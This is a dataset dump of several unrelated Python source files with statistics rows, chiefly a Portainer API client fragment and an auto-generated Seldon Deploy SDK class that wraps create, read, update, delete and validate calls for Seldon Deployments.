        r = requests.put(
            self.portainer_endpoint + "/endpoints/{}/stacks/{}".format(endpoint, stack),
            data=json.dumps(options),
            headers={"Authorization": "Bearer {}".format(self.token)},
            verify=self.verifySSL)
        return r.json()

    def delete_stack(self, endpoint, stack):
        r = requests.delete(
            self.portainer_endpoint + "/endpoints/{}/stacks/{}".format(endpoint, stack),
            headers={"Authorization": "Bearer {}".format(self.token)},
            verify=self.verifySSL)
        return r.json()

    def get_stackfile(self, endpoint, stack):
        r = requests.get(
            self.portainer_endpoint + "/endpoints/{}/stacks/{}/stackfile".format(endpoint, stack),
            headers={"Authorization": "Bearer {}".format(self.token)},
            verify=self.verifySSL)
        return r.json()
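
# A minimal usage sketch (the host URL and credentials below are placeholders;
# a reachable Portainer instance and valid account are assumed):
#
#   client = PyPortainer("https://portainer.example.com")
#   client.login("admin", "secret")
#   for ep in client.get_endpoints():
#       print(ep.get("Id"), ep.get("Name"))
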
| 36.138686 | 99 | 0.562715 | 471 | 4,951 | 5.830149 | 0.095541 | 0.117626 | 0.137655 | 0.1748 | 0.840131 | 0.824108 | 0.801894 | 0.721049 | 0.677713 | 0.677713 | 0 | 0 | 0.299333 | 4,951 | 137 | 100 | 36.138686 | 0.791583 | 0 | 0 | 0.731481 | 0 | 0 | 0.122375 | 0.020598 | 0 | 0 | 0 | 0 | 0 | 1 | 0.157407 | false | 0.018519 | 0.018519 | 0 | 0.324074 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
e5b665c377656f6ac743c799c0531093d63a5ab4 | 119 | py | Python | scripts/utils.py | kjenney/community-ops | c9132079e3685f7457199ef2f37c7d5d8361d67e | [
"Apache-2.0"
] | 14 | 2021-08-10T03:46:25.000Z | 2022-03-16T11:25:01.000Z | scripts/utils.py | kjenney/community-ops | c9132079e3685f7457199ef2f37c7d5d8361d67e | [
"Apache-2.0"
] | null | null | null | scripts/utils.py | kjenney/community-ops | c9132079e3685f7457199ef2f37c7d5d8361d67e | [
"Apache-2.0"
] | 4 | 2020-11-03T07:14:45.000Z | 2022-02-25T23:31:53.000Z | def print_header(text):
print("\n\n**********************")
print(text)
print("**********************\n")
| 19.833333 | 39 | 0.344538 | 11 | 119 | 3.636364 | 0.454545 | 0.45 | 0.5 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.151261 | 119 | 5 | 40 | 23.8 | 0.39604 | 0 | 0 | 0 | 0 | 0 | 0.423729 | 0.423729 | 0 | 0 | 0 | 0 | 0 | 1 | 0.25 | false | 0 | 0 | 0 | 0.25 | 1 | 1 | 0 | 0 | null | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 8 |
e5fafb1a4e21a0dd48d8a25ec48fef57726dfc6e | 194 | py | Python | libcheesevoyage/intrcn_lcv/__init__.py | fl4shk/libcheesevoyage | 559a27a95e14f25f2e7173a09566775013e40b1a | [
"MIT"
] | null | null | null | libcheesevoyage/intrcn_lcv/__init__.py | fl4shk/libcheesevoyage | 559a27a95e14f25f2e7173a09566775013e40b1a | [
"MIT"
] | null | null | null | libcheesevoyage/intrcn_lcv/__init__.py | fl4shk/libcheesevoyage | 559a27a95e14f25f2e7173a09566775013e40b1a | [
"MIT"
] | null | null | null | from libcheesevoyage.intrcn_lcv.xbar_switch_mod import *
from libcheesevoyage.intrcn_lcv.intrcn_lcv_node_bus_types import *
from libcheesevoyage.intrcn_lcv.intrcn_lcv_interconnect_mods import *
| 48.5 | 69 | 0.891753 | 27 | 194 | 5.962963 | 0.481481 | 0.279503 | 0.465839 | 0.521739 | 0.534161 | 0.534161 | 0.534161 | 0 | 0 | 0 | 0 | 0 | 0.061856 | 194 | 3 | 70 | 64.666667 | 0.884615 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 8 |
f902893a9c19db0ee9f7f5f53cf9bfc163f7e3e9 | 665 | py | Python | temboo/core/Library/OneLogin/Users/__init__.py | jordanemedlock/psychtruths | 52e09033ade9608bd5143129f8a1bfac22d634dd | [
"Apache-2.0"
] | 7 | 2016-03-07T02:07:21.000Z | 2022-01-21T02:22:41.000Z | temboo/core/Library/OneLogin/Users/__init__.py | jordanemedlock/psychtruths | 52e09033ade9608bd5143129f8a1bfac22d634dd | [
"Apache-2.0"
] | null | null | null | temboo/core/Library/OneLogin/Users/__init__.py | jordanemedlock/psychtruths | 52e09033ade9608bd5143129f8a1bfac22d634dd | [
"Apache-2.0"
] | 8 | 2016-06-14T06:01:11.000Z | 2020-04-22T09:21:44.000Z | from temboo.Library.OneLogin.Users.CreateUser import CreateUser, CreateUserInputSet, CreateUserResultSet, CreateUserChoreographyExecution
from temboo.Library.OneLogin.Users.DeleteUser import DeleteUser, DeleteUserInputSet, DeleteUserResultSet, DeleteUserChoreographyExecution
from temboo.Library.OneLogin.Users.ListAll import ListAll, ListAllInputSet, ListAllResultSet, ListAllChoreographyExecution
from temboo.Library.OneLogin.Users.ShowUser import ShowUser, ShowUserInputSet, ShowUserResultSet, ShowUserChoreographyExecution
from temboo.Library.OneLogin.Users.UpdateUser import UpdateUser, UpdateUserInputSet, UpdateUserResultSet, UpdateUserChoreographyExecution
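
# A usage sketch following the standard Temboo SDK pattern (the account name and
# app-key values below are placeholders, and the session import path is assumed
# from the SDK's usual layout):
#
#   from temboo.core.session import TembooSession
#   session = TembooSession('ACCOUNT_NAME', 'APP_KEY_NAME', 'APP_KEY_VALUE')
#   choreo = ListAll(session)
#   inputs = choreo.new_input_set()
#   results = choreo.execute_with_results(inputs)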
| 110.833333 | 137 | 0.894737 | 55 | 665 | 10.818182 | 0.472727 | 0.084034 | 0.142857 | 0.210084 | 0.252101 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.052632 | 665 | 5 | 138 | 133 | 0.944444 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 1 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 7 |
0082d8da1b94bddc9ac20c43bb4446e959ab74fe | 29,601 | py | Python | python/seldon_deploy_sdk/api/seldon_deployments_api.py | adriangonz/seldon-deploy-sdk | c5504838630a87053387cec57ec2e1e7251971e2 | [
"Apache-2.0"
] | 6 | 2021-02-18T14:37:54.000Z | 2022-01-13T13:27:43.000Z | python/seldon_deploy_sdk/api/seldon_deployments_api.py | adriangonz/seldon-deploy-sdk | c5504838630a87053387cec57ec2e1e7251971e2 | [
"Apache-2.0"
] | 14 | 2021-01-04T16:32:03.000Z | 2021-12-13T17:53:59.000Z | python/seldon_deploy_sdk/api/seldon_deployments_api.py | adriangonz/seldon-deploy-sdk | c5504838630a87053387cec57ec2e1e7251971e2 | [
"Apache-2.0"
] | 7 | 2021-03-17T09:05:55.000Z | 2022-01-05T10:39:56.000Z | # coding: utf-8
"""
Seldon Deploy API
API to interact and manage the lifecycle of your machine learning models deployed through Seldon Deploy. # noqa: E501
OpenAPI spec version: v1alpha1
Contact: hello@seldon.io
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
from __future__ import absolute_import
import re # noqa: F401
# python 2 and python 3 compatibility library
import six
from seldon_deploy_sdk.api_client import ApiClient
class SeldonDeploymentsApi(object):
"""NOTE: This class is auto generated by the swagger code generator program.
Do not edit the class manually.
Ref: https://github.com/swagger-api/swagger-codegen
"""
def __init__(self, api_client=None):
if api_client is None:
api_client = ApiClient()
self.api_client = api_client
    def create_seldon_deployment(self, namespace, mldeployment, **kwargs):  # noqa: E501
        """create_seldon_deployment  # noqa: E501

        Create a Seldon Deployment  # noqa: E501
        This method makes a synchronous HTTP request by default. To make an
        asynchronous HTTP request, please pass async_req=True
        >>> thread = api.create_seldon_deployment(namespace, mldeployment, async_req=True)
        >>> result = thread.get()

        :param async_req bool
        :param str namespace: Namespace provides a logical grouping of resources (required)
        :param SeldonDeployment mldeployment: Seldon Deployment (required)
        :param str action: Action
        :param str message: Message
        :return: SeldonDeployment
                 If the method is called asynchronously,
                 returns the request thread.
        """
        kwargs['_return_http_data_only'] = True
        if kwargs.get('async_req'):
            return self.create_seldon_deployment_with_http_info(namespace, mldeployment, **kwargs)  # noqa: E501
        else:
            (data) = self.create_seldon_deployment_with_http_info(namespace, mldeployment, **kwargs)  # noqa: E501
            return data

    def create_seldon_deployment_with_http_info(self, namespace, mldeployment, **kwargs):  # noqa: E501
        """create_seldon_deployment  # noqa: E501

        Create a Seldon Deployment  # noqa: E501
        This method makes a synchronous HTTP request by default. To make an
        asynchronous HTTP request, please pass async_req=True
        >>> thread = api.create_seldon_deployment_with_http_info(namespace, mldeployment, async_req=True)
        >>> result = thread.get()

        :param async_req bool
        :param str namespace: Namespace provides a logical grouping of resources (required)
        :param SeldonDeployment mldeployment: Seldon Deployment (required)
        :param str action: Action
        :param str message: Message
        :return: SeldonDeployment
                 If the method is called asynchronously,
                 returns the request thread.
        """

        all_params = ['namespace', 'mldeployment', 'action', 'message']  # noqa: E501
        all_params.append('async_req')
        all_params.append('_return_http_data_only')
        all_params.append('_preload_content')
        all_params.append('_request_timeout')

        params = locals()
        for key, val in six.iteritems(params['kwargs']):
            if key not in all_params:
                raise TypeError(
                    "Got an unexpected keyword argument '%s'"
                    " to method create_seldon_deployment" % key
                )
            params[key] = val
        del params['kwargs']
        # verify the required parameter 'namespace' is set
        if ('namespace' not in params or
                params['namespace'] is None):
            raise ValueError("Missing the required parameter `namespace` when calling `create_seldon_deployment`")  # noqa: E501
        # verify the required parameter 'mldeployment' is set
        if ('mldeployment' not in params or
                params['mldeployment'] is None):
            raise ValueError("Missing the required parameter `mldeployment` when calling `create_seldon_deployment`")  # noqa: E501

        collection_formats = {}

        path_params = {}
        if 'namespace' in params:
            path_params['namespace'] = params['namespace']  # noqa: E501

        query_params = []
        if 'action' in params:
            query_params.append(('action', params['action']))  # noqa: E501
        if 'message' in params:
            query_params.append(('message', params['message']))  # noqa: E501

        header_params = {}

        form_params = []
        local_var_files = {}

        body_params = None
        if 'mldeployment' in params:
            body_params = params['mldeployment']
        # HTTP header `Accept`
        header_params['Accept'] = self.api_client.select_header_accept(
            ['application/json'])  # noqa: E501

        # HTTP header `Content-Type`
        header_params['Content-Type'] = self.api_client.select_header_content_type(  # noqa: E501
            ['application/json'])  # noqa: E501

        # Authentication setting
        auth_settings = ['OAuth2']  # noqa: E501

        return self.api_client.call_api(
            '/namespaces/{namespace}/seldondeployments', 'POST',
            path_params,
            query_params,
            header_params,
            body=body_params,
            post_params=form_params,
            files=local_var_files,
            response_type='SeldonDeployment',  # noqa: E501
            auth_settings=auth_settings,
            async_req=params.get('async_req'),
            _return_http_data_only=params.get('_return_http_data_only'),
            _preload_content=params.get('_preload_content', True),
            _request_timeout=params.get('_request_timeout'),
            collection_formats=collection_formats)
    def delete_seldon_deployment(self, name, namespace, **kwargs):  # noqa: E501
        """delete_seldon_deployment  # noqa: E501

        Delete the specified Seldon Deployment  # noqa: E501
        This method makes a synchronous HTTP request by default. To make an
        asynchronous HTTP request, please pass async_req=True
        >>> thread = api.delete_seldon_deployment(name, namespace, async_req=True)
        >>> result = thread.get()

        :param async_req bool
        :param str name: Name identifies a resource (required)
        :param str namespace: Namespace provides a logical grouping of resources (required)
        :param str action: Action
        :param str message: Message
        :return: object
                 If the method is called asynchronously,
                 returns the request thread.
        """
        kwargs['_return_http_data_only'] = True
        if kwargs.get('async_req'):
            return self.delete_seldon_deployment_with_http_info(name, namespace, **kwargs)  # noqa: E501
        else:
            (data) = self.delete_seldon_deployment_with_http_info(name, namespace, **kwargs)  # noqa: E501
            return data

    def delete_seldon_deployment_with_http_info(self, name, namespace, **kwargs):  # noqa: E501
        """delete_seldon_deployment  # noqa: E501

        Delete the specified Seldon Deployment  # noqa: E501
        This method makes a synchronous HTTP request by default. To make an
        asynchronous HTTP request, please pass async_req=True
        >>> thread = api.delete_seldon_deployment_with_http_info(name, namespace, async_req=True)
        >>> result = thread.get()

        :param async_req bool
        :param str name: Name identifies a resource (required)
        :param str namespace: Namespace provides a logical grouping of resources (required)
        :param str action: Action
        :param str message: Message
        :return: object
                 If the method is called asynchronously,
                 returns the request thread.
        """

        all_params = ['name', 'namespace', 'action', 'message']  # noqa: E501
        all_params.append('async_req')
        all_params.append('_return_http_data_only')
        all_params.append('_preload_content')
        all_params.append('_request_timeout')

        params = locals()
        for key, val in six.iteritems(params['kwargs']):
            if key not in all_params:
                raise TypeError(
                    "Got an unexpected keyword argument '%s'"
                    " to method delete_seldon_deployment" % key
                )
            params[key] = val
        del params['kwargs']
        # verify the required parameter 'name' is set
        if ('name' not in params or
                params['name'] is None):
            raise ValueError("Missing the required parameter `name` when calling `delete_seldon_deployment`")  # noqa: E501
        # verify the required parameter 'namespace' is set
        if ('namespace' not in params or
                params['namespace'] is None):
            raise ValueError("Missing the required parameter `namespace` when calling `delete_seldon_deployment`")  # noqa: E501

        collection_formats = {}

        path_params = {}
        if 'name' in params:
            path_params['name'] = params['name']  # noqa: E501
        if 'namespace' in params:
            path_params['namespace'] = params['namespace']  # noqa: E501

        query_params = []
        if 'action' in params:
            query_params.append(('action', params['action']))  # noqa: E501
        if 'message' in params:
            query_params.append(('message', params['message']))  # noqa: E501

        header_params = {}

        form_params = []
        local_var_files = {}

        body_params = None
        # HTTP header `Accept`
        header_params['Accept'] = self.api_client.select_header_accept(
            ['application/json'])  # noqa: E501

        # HTTP header `Content-Type`
        header_params['Content-Type'] = self.api_client.select_header_content_type(  # noqa: E501
            ['application/json'])  # noqa: E501

        # Authentication setting
        auth_settings = ['OAuth2']  # noqa: E501

        return self.api_client.call_api(
            '/namespaces/{namespace}/seldondeployments/{name}', 'DELETE',
            path_params,
            query_params,
            header_params,
            body=body_params,
            post_params=form_params,
            files=local_var_files,
            response_type='object',  # noqa: E501
            auth_settings=auth_settings,
            async_req=params.get('async_req'),
            _return_http_data_only=params.get('_return_http_data_only'),
            _preload_content=params.get('_preload_content', True),
            _request_timeout=params.get('_request_timeout'),
            collection_formats=collection_formats)
    def list_seldon_deployments(self, namespace, **kwargs):  # noqa: E501
        """list_seldon_deployments  # noqa: E501

        list objects of kind Seldon Deployment  # noqa: E501
        This method makes a synchronous HTTP request by default. To make an
        asynchronous HTTP request, please pass async_req=True
        >>> thread = api.list_seldon_deployments(namespace, async_req=True)
        >>> result = thread.get()

        :param async_req bool
        :param str namespace: Namespace provides a logical grouping of resources (required)
        :return: SeldonDeploymentList
                 If the method is called asynchronously,
                 returns the request thread.
        """
        kwargs['_return_http_data_only'] = True
        if kwargs.get('async_req'):
            return self.list_seldon_deployments_with_http_info(namespace, **kwargs)  # noqa: E501
        else:
            (data) = self.list_seldon_deployments_with_http_info(namespace, **kwargs)  # noqa: E501
            return data

    def list_seldon_deployments_with_http_info(self, namespace, **kwargs):  # noqa: E501
        """list_seldon_deployments  # noqa: E501

        list objects of kind Seldon Deployment  # noqa: E501
        This method makes a synchronous HTTP request by default. To make an
        asynchronous HTTP request, please pass async_req=True
        >>> thread = api.list_seldon_deployments_with_http_info(namespace, async_req=True)
        >>> result = thread.get()

        :param async_req bool
        :param str namespace: Namespace provides a logical grouping of resources (required)
        :return: SeldonDeploymentList
                 If the method is called asynchronously,
                 returns the request thread.
        """

        all_params = ['namespace']  # noqa: E501
        all_params.append('async_req')
        all_params.append('_return_http_data_only')
        all_params.append('_preload_content')
        all_params.append('_request_timeout')

        params = locals()
        for key, val in six.iteritems(params['kwargs']):
            if key not in all_params:
                raise TypeError(
                    "Got an unexpected keyword argument '%s'"
                    " to method list_seldon_deployments" % key
                )
            params[key] = val
        del params['kwargs']
        # verify the required parameter 'namespace' is set
        if ('namespace' not in params or
                params['namespace'] is None):
            raise ValueError("Missing the required parameter `namespace` when calling `list_seldon_deployments`")  # noqa: E501

        collection_formats = {}

        path_params = {}
        if 'namespace' in params:
            path_params['namespace'] = params['namespace']  # noqa: E501

        query_params = []

        header_params = {}

        form_params = []
        local_var_files = {}

        body_params = None
        # HTTP header `Accept`
        header_params['Accept'] = self.api_client.select_header_accept(
            ['application/json'])  # noqa: E501

        # HTTP header `Content-Type`
        header_params['Content-Type'] = self.api_client.select_header_content_type(  # noqa: E501
            ['application/json'])  # noqa: E501

        # Authentication setting
        auth_settings = ['OAuth2']  # noqa: E501

        return self.api_client.call_api(
            '/namespaces/{namespace}/seldondeployments', 'GET',
            path_params,
            query_params,
            header_params,
            body=body_params,
            post_params=form_params,
            files=local_var_files,
            response_type='SeldonDeploymentList',  # noqa: E501
            auth_settings=auth_settings,
            async_req=params.get('async_req'),
            _return_http_data_only=params.get('_return_http_data_only'),
            _preload_content=params.get('_preload_content', True),
            _request_timeout=params.get('_request_timeout'),
            collection_formats=collection_formats)
    def read_seldon_deployment(self, name, namespace, **kwargs):  # noqa: E501
        """read_seldon_deployment  # noqa: E501

        Read the specified Seldon Deployment  # noqa: E501
        This method makes a synchronous HTTP request by default. To make an
        asynchronous HTTP request, please pass async_req=True
        >>> thread = api.read_seldon_deployment(name, namespace, async_req=True)
        >>> result = thread.get()

        :param async_req bool
        :param str name: Name identifies a resource (required)
        :param str namespace: Namespace provides a logical grouping of resources (required)
        :return: SeldonDeployment
                 If the method is called asynchronously,
                 returns the request thread.
        """
        kwargs['_return_http_data_only'] = True
        if kwargs.get('async_req'):
            return self.read_seldon_deployment_with_http_info(name, namespace, **kwargs)  # noqa: E501
        else:
            (data) = self.read_seldon_deployment_with_http_info(name, namespace, **kwargs)  # noqa: E501
            return data

    def read_seldon_deployment_with_http_info(self, name, namespace, **kwargs):  # noqa: E501
        """read_seldon_deployment  # noqa: E501

        Read the specified Seldon Deployment  # noqa: E501
        This method makes a synchronous HTTP request by default. To make an
        asynchronous HTTP request, please pass async_req=True
        >>> thread = api.read_seldon_deployment_with_http_info(name, namespace, async_req=True)
        >>> result = thread.get()

        :param async_req bool
        :param str name: Name identifies a resource (required)
        :param str namespace: Namespace provides a logical grouping of resources (required)
        :return: SeldonDeployment
                 If the method is called asynchronously,
                 returns the request thread.
        """

        all_params = ['name', 'namespace']  # noqa: E501
        all_params.append('async_req')
        all_params.append('_return_http_data_only')
        all_params.append('_preload_content')
        all_params.append('_request_timeout')

        params = locals()
        for key, val in six.iteritems(params['kwargs']):
            if key not in all_params:
                raise TypeError(
                    "Got an unexpected keyword argument '%s'"
                    " to method read_seldon_deployment" % key
                )
            params[key] = val
        del params['kwargs']
        # verify the required parameter 'name' is set
        if ('name' not in params or
                params['name'] is None):
            raise ValueError("Missing the required parameter `name` when calling `read_seldon_deployment`")  # noqa: E501
        # verify the required parameter 'namespace' is set
        if ('namespace' not in params or
                params['namespace'] is None):
            raise ValueError("Missing the required parameter `namespace` when calling `read_seldon_deployment`")  # noqa: E501

        collection_formats = {}

        path_params = {}
        if 'name' in params:
            path_params['name'] = params['name']  # noqa: E501
        if 'namespace' in params:
            path_params['namespace'] = params['namespace']  # noqa: E501

        query_params = []

        header_params = {}

        form_params = []
        local_var_files = {}

        body_params = None
        # HTTP header `Accept`
        header_params['Accept'] = self.api_client.select_header_accept(
            ['application/json'])  # noqa: E501

        # HTTP header `Content-Type`
        header_params['Content-Type'] = self.api_client.select_header_content_type(  # noqa: E501
            ['application/json'])  # noqa: E501

        # Authentication setting
        auth_settings = ['OAuth2']  # noqa: E501

        return self.api_client.call_api(
            '/namespaces/{namespace}/seldondeployments/{name}', 'GET',
            path_params,
            query_params,
            header_params,
            body=body_params,
            post_params=form_params,
            files=local_var_files,
            response_type='SeldonDeployment',  # noqa: E501
            auth_settings=auth_settings,
            async_req=params.get('async_req'),
            _return_http_data_only=params.get('_return_http_data_only'),
            _preload_content=params.get('_preload_content', True),
            _request_timeout=params.get('_request_timeout'),
            collection_formats=collection_formats)
    def update_seldon_deployment(self, name, namespace, mldeployment, **kwargs):  # noqa: E501
        """update_seldon_deployment  # noqa: E501

        Update the specified Seldon Deployment  # noqa: E501
        This method makes a synchronous HTTP request by default. To make an
        asynchronous HTTP request, please pass async_req=True
        >>> thread = api.update_seldon_deployment(name, namespace, mldeployment, async_req=True)
        >>> result = thread.get()

        :param async_req bool
        :param str name: Name identifies a resource (required)
        :param str namespace: Namespace provides a logical grouping of resources (required)
        :param SeldonDeployment mldeployment: Seldon Deployment (required)
        :param str action: Action
        :param str message: Message
        :return: SeldonDeployment
                 If the method is called asynchronously,
                 returns the request thread.
        """
        kwargs['_return_http_data_only'] = True
        if kwargs.get('async_req'):
            return self.update_seldon_deployment_with_http_info(name, namespace, mldeployment, **kwargs)  # noqa: E501
        else:
            (data) = self.update_seldon_deployment_with_http_info(name, namespace, mldeployment, **kwargs)  # noqa: E501
            return data

    def update_seldon_deployment_with_http_info(self, name, namespace, mldeployment, **kwargs):  # noqa: E501
        """update_seldon_deployment  # noqa: E501

        Update the specified Seldon Deployment  # noqa: E501
        This method makes a synchronous HTTP request by default. To make an
        asynchronous HTTP request, please pass async_req=True
        >>> thread = api.update_seldon_deployment_with_http_info(name, namespace, mldeployment, async_req=True)
        >>> result = thread.get()

        :param async_req bool
        :param str name: Name identifies a resource (required)
        :param str namespace: Namespace provides a logical grouping of resources (required)
        :param SeldonDeployment mldeployment: Seldon Deployment (required)
        :param str action: Action
        :param str message: Message
        :return: SeldonDeployment
                 If the method is called asynchronously,
                 returns the request thread.
        """

        all_params = ['name', 'namespace', 'mldeployment', 'action', 'message']  # noqa: E501
        all_params.append('async_req')
        all_params.append('_return_http_data_only')
        all_params.append('_preload_content')
        all_params.append('_request_timeout')

        params = locals()
        for key, val in six.iteritems(params['kwargs']):
            if key not in all_params:
                raise TypeError(
                    "Got an unexpected keyword argument '%s'"
                    " to method update_seldon_deployment" % key
                )
            params[key] = val
        del params['kwargs']
        # verify the required parameter 'name' is set
        if ('name' not in params or
                params['name'] is None):
            raise ValueError("Missing the required parameter `name` when calling `update_seldon_deployment`")  # noqa: E501
        # verify the required parameter 'namespace' is set
        if ('namespace' not in params or
                params['namespace'] is None):
            raise ValueError("Missing the required parameter `namespace` when calling `update_seldon_deployment`")  # noqa: E501
        # verify the required parameter 'mldeployment' is set
        if ('mldeployment' not in params or
                params['mldeployment'] is None):
            raise ValueError("Missing the required parameter `mldeployment` when calling `update_seldon_deployment`")  # noqa: E501

        collection_formats = {}

        path_params = {}
        if 'name' in params:
            path_params['name'] = params['name']  # noqa: E501
        if 'namespace' in params:
            path_params['namespace'] = params['namespace']  # noqa: E501

        query_params = []
        if 'action' in params:
            query_params.append(('action', params['action']))  # noqa: E501
        if 'message' in params:
            query_params.append(('message', params['message']))  # noqa: E501

        header_params = {}

        form_params = []
        local_var_files = {}

        body_params = None
        if 'mldeployment' in params:
            body_params = params['mldeployment']
        # HTTP header `Accept`
        header_params['Accept'] = self.api_client.select_header_accept(
            ['application/json'])  # noqa: E501

        # HTTP header `Content-Type`
        header_params['Content-Type'] = self.api_client.select_header_content_type(  # noqa: E501
            ['application/json'])  # noqa: E501

        # Authentication setting
        auth_settings = ['OAuth2']  # noqa: E501

        return self.api_client.call_api(
            '/namespaces/{namespace}/seldondeployments/{name}', 'PUT',
            path_params,
            query_params,
            header_params,
            body=body_params,
            post_params=form_params,
            files=local_var_files,
            response_type='SeldonDeployment',  # noqa: E501
            auth_settings=auth_settings,
            async_req=params.get('async_req'),
            _return_http_data_only=params.get('_return_http_data_only'),
            _preload_content=params.get('_preload_content', True),
            _request_timeout=params.get('_request_timeout'),
            collection_formats=collection_formats)
    def validate_seldon_deployment(self, namespace, mldeployment, **kwargs):  # noqa: E501
        """validate_seldon_deployment  # noqa: E501

        Validate the given Seldon Deployment  # noqa: E501
        This method makes a synchronous HTTP request by default. To make an
        asynchronous HTTP request, please pass async_req=True
        >>> thread = api.validate_seldon_deployment(namespace, mldeployment, async_req=True)
        >>> result = thread.get()

        :param async_req bool
        :param str namespace: Namespace provides a logical grouping of resources (required)
        :param SeldonDeployment mldeployment: Seldon Deployment (required)
        :return: Message
                 If the method is called asynchronously,
                 returns the request thread.
        """
        kwargs['_return_http_data_only'] = True
        if kwargs.get('async_req'):
            return self.validate_seldon_deployment_with_http_info(namespace, mldeployment, **kwargs)  # noqa: E501
        else:
            (data) = self.validate_seldon_deployment_with_http_info(namespace, mldeployment, **kwargs)  # noqa: E501
            return data

    def validate_seldon_deployment_with_http_info(self, namespace, mldeployment, **kwargs):  # noqa: E501
        """validate_seldon_deployment  # noqa: E501

        Validate the given Seldon Deployment  # noqa: E501
        This method makes a synchronous HTTP request by default. To make an
        asynchronous HTTP request, please pass async_req=True
        >>> thread = api.validate_seldon_deployment_with_http_info(namespace, mldeployment, async_req=True)
        >>> result = thread.get()

        :param async_req bool
        :param str namespace: Namespace provides a logical grouping of resources (required)
        :param SeldonDeployment mldeployment: Seldon Deployment (required)
        :return: Message
                 If the method is called asynchronously,
                 returns the request thread.
        """

        all_params = ['namespace', 'mldeployment']  # noqa: E501
        all_params.append('async_req')
        all_params.append('_return_http_data_only')
        all_params.append('_preload_content')
        all_params.append('_request_timeout')

        params = locals()
        for key, val in six.iteritems(params['kwargs']):
            if key not in all_params:
                raise TypeError(
                    "Got an unexpected keyword argument '%s'"
                    " to method validate_seldon_deployment" % key
                )
            params[key] = val
        del params['kwargs']
        # verify the required parameter 'namespace' is set
        if ('namespace' not in params or
                params['namespace'] is None):
            raise ValueError("Missing the required parameter `namespace` when calling `validate_seldon_deployment`")  # noqa: E501
        # verify the required parameter 'mldeployment' is set
        if ('mldeployment' not in params or
                params['mldeployment'] is None):
            raise ValueError("Missing the required parameter `mldeployment` when calling `validate_seldon_deployment`")  # noqa: E501

        collection_formats = {}

        path_params = {}
        if 'namespace' in params:
            path_params['namespace'] = params['namespace']  # noqa: E501

        query_params = []

        header_params = {}

        form_params = []
        local_var_files = {}

        body_params = None
        if 'mldeployment' in params:
            body_params = params['mldeployment']
        # HTTP header `Accept`
        header_params['Accept'] = self.api_client.select_header_accept(
            ['application/json'])  # noqa: E501

        # HTTP header `Content-Type`
        header_params['Content-Type'] = self.api_client.select_header_content_type(  # noqa: E501
            ['application/json'])  # noqa: E501

        # Authentication setting
        auth_settings = ['OAuth2']  # noqa: E501

        return self.api_client.call_api(
            '/namespaces/{namespace}/seldondeployments/validate', 'GET',
            path_params,
            query_params,
            header_params,
            body=body_params,
            post_params=form_params,
            files=local_var_files,
            response_type='Message',  # noqa: E501
            auth_settings=auth_settings,
            async_req=params.get('async_req'),
            _return_http_data_only=params.get('_return_http_data_only'),
            _preload_content=params.get('_preload_content', True),
            _request_timeout=params.get('_request_timeout'),
            collection_formats=collection_formats)
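
# A minimal usage sketch (hypothetical host; OAuth2 setup on the Configuration
# object is assumed to follow the SDK's documented flow, and the Configuration
# import path is assumed from the usual swagger-codegen package layout):
#
#   from seldon_deploy_sdk import ApiClient, Configuration
#   config = Configuration()
#   config.host = "https://deploy.example.com/seldon-deploy/api/v1alpha1"
#   api = SeldonDeploymentsApi(ApiClient(config))
#   deployments = api.list_seldon_deployments("seldon")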
| 42.226819 | 133 | 0.626736 | 3,243 | 29,601 | 5.504471 | 0.056121 | 0.050193 | 0.036973 | 0.044367 | 0.962187 | 0.960114 | 0.956585 | 0.947454 | 0.941124 | 0.940452 | 0 | 0.016539 | 0.285092 | 29,601 | 700 | 134 | 42.287143 | 0.827001 | 0.33786 | 0 | 0.808 | 0 | 0 | 0.214242 | 0.062158 | 0 | 0 | 0 | 0 | 0 | 1 | 0.034667 | false | 0 | 0.010667 | 0 | 0.096 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
008cc1ca7b077f8413c28e982d1be1f46cc194d4 | 41,485 | py | Python | sdk/python/pulumi_azure/monitoring/scheduled_query_rules_alert.py | henriktao/pulumi-azure | f1cbcf100b42b916da36d8fe28be3a159abaf022 | [
"ECL-2.0",
"Apache-2.0"
] | 109 | 2018-06-18T00:19:44.000Z | 2022-02-20T05:32:57.000Z | sdk/python/pulumi_azure/monitoring/scheduled_query_rules_alert.py | henriktao/pulumi-azure | f1cbcf100b42b916da36d8fe28be3a159abaf022 | [
"ECL-2.0",
"Apache-2.0"
] | 663 | 2018-06-18T21:08:46.000Z | 2022-03-31T20:10:11.000Z | sdk/python/pulumi_azure/monitoring/scheduled_query_rules_alert.py | henriktao/pulumi-azure | f1cbcf100b42b916da36d8fe28be3a159abaf022 | [
"ECL-2.0",
"Apache-2.0"
